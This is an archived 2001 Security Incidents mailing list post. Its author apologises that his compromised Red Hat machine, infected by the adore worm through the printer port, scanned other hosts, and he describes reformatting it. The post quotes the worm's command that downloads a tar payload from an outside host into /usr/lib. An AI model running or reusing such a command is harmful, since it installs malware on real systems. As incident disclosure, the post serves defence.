Security Incidents mailing list archives
Mea Culpa
From: Etaoin Shrdlu <shrdlu () deaddrop org>
Date: Sat, 23 Jun 2001 11:15:56 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 If you saw anything from my redhat/linux machine in the past few hours, Sorry. Jun 23 07:42|206.111.213.148|2650|65.169.x.x|53 Jun 23 07:42|206.111.213.148|2822|65.199.x.x|515 Jun 23 07:42|206.111.213.148|2823|65.199.x.x|515 Yet another rootkit. It was slated to be upgraded to progeny/linux over the weekend, and I'm still deciding on whether to bother with forensics. It is an automated script, so I doubt that much information will be useful. The standard stuff on the standard, easily compromisable ports. They got in through the printer port, which I thought had been shut down. Famous last words. If it appears to be unique, I'll send it off to the places that seem to be archiving these things. Most of the interesting data (and certainly an early trigger) that warned me instantly that something was up (besides the mad green lights on the router when I wasn't doing anything to cause them) was clog (connection logger), a fine piece of code whose original author seems to have disappeared from the face of the earth. ... Well, after further examination, it's just yet another adore worm running pscan-* stuff against innocent folk out there. It was dumping from the following: lynx -dump http://go.163.com/laowang2001/red.tar >/usr/lib/red.tar The rest is history (except for all the passwords I get to change, just in case I had a duplicate somewhere). Again, if my bad boy bothered you from pacific time 11pm June 22 until approximately 8am june 23, I'm sorry. I'll be reformatting the disk before it goes back up, and it'll either have slack or debian (two civilized distros, in my personal opinion), well-patched. .shrdlu -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQA/AwUBOzTcliseoSr+8iWrEQKIeACg0vWZ/nSrgS0wIdId6epU3izbe7oAoJKq H8F3x5rc+BG6441TNTIP9htP =wol2 -----END PGP SIGNATURE----- -- Computer security is an oxymoron. Prepare for the worst. -- Bruce Schneier
Current thread:
- Mea Culpa Etaoin Shrdlu (Jun 24)